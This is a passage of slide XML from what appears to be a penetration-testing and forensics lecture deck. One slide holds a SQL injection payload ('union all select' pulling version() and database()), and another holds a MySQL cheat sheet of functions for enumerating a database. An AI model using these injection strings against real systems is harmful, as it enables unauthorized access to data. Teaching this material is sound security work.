              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="5A5A5A"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8534160" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>' union all select 1,version(),database(),4,5,6#</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="685" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="5105160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-76320"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>MySQL cheat sheet</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="687" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Description</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQL command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>version			 : version()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>		current user		 : user(), system_user()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>		hostname 		 : @@hostname</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>		location of data	 : @@datadir</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Try certain command which is quite interesting.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>LIKE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>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TotalTime>
  <Words>3324</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>508</Paragraphs>
  <Slides>154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154</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="161" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Arial Rounded MT Bold</vt:lpstr>
      <vt:lpstr>Bebas Neue</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Penetration testing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Forensic</vt:lpstr>
      <vt:lpstr>Data Recovery</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Network Forensic</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Mail Header Location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Azuan</dc:creator>
  <cp:lastModifiedBy>Dr. Azuan bin Ahmad</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <cp:lastPrinted>2015-04-23T01:21:33Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-24T02:01:32Z</dcterms:modified>
</cp:coreProperties>
</file>